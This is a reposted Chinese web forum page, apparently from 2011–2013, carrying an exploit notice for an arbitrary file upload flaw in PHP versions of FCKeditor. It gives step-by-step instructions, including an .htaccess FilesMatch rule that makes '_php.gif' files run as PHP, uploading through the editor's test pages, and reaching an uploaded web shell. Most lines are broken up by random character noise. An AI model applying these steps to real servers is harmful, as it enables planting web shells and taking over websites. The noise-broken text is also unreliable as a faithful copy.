FCKeditor所有php版本Upload上传漏洞; H2 a" H& X2 X2 d. k' l
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
) X; W/ K. Q0 y/ g- [* C* n减小字体 增大字体* H0 V" W' W) q' s% {
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
9 S9 f$ v7 @ h0 s# G# Z2 O[+] Date: 2011
4 Y, D1 A, s# I7 h5 [[+] Author : sinesafe.cn( D* ^9 l5 H" V) \5 q$ v% V
[+] Website : WwW.sinesafe.cn3 U) s+ L6 d0 D) j8 U
———————————————————; a! f5 s! S- t* f+ \. _
1.create a htaccess file:# C( c$ E- C& b; b
code:
' u Y; K; n# H<FilesMatch “_php.gif”>% H6 U5 X. p( v; l$ l1 {& j: c9 r
SetHandler application/x-httpd-php, N6 b6 B( L$ l; k- Z& p
</FilesMatch>7 K1 P- n3 i: Y
. t7 D$ U6 a6 Z) E% S
2.Now upload this htaccess with FCKeditor.
! t2 O1 J8 s2 ^+ N1 n2 y
4 ~7 x% V2 w* f' J/ R1 T" f' {http://www.sinesafe.cn/FCKeditor ... er/upload/test.html8 [0 I; p( k* P2 b3 a, d
5 A# v3 h# i+ ]) L( }5 phttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html
, ]: i2 I" K' t5 o* v8 F, t! `, h5 q/ q" h* u( }# R* Y
———————————————————————————————-
! j7 k% N6 q0 C- W9 c; P3 T8 {/ L3.Now upload shell.php.gif with FCKeditor.3 a% y% y5 N* _) h) [
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
# p$ q9 [# F" @ Q( f' s* W5.http://www.sinesafe.cn/anything/shell_php.gif! z. q8 T( f/ ?
6.Now shell is available from server. |
; D# U, t; A& u3 P: d |% x
, }, B: \( V. Q2 Q8 x$ Z) { K2 y! n: E, u" Q. g5 W
|
发表于 2013-10-27 17:25:21
收藏
支持
反对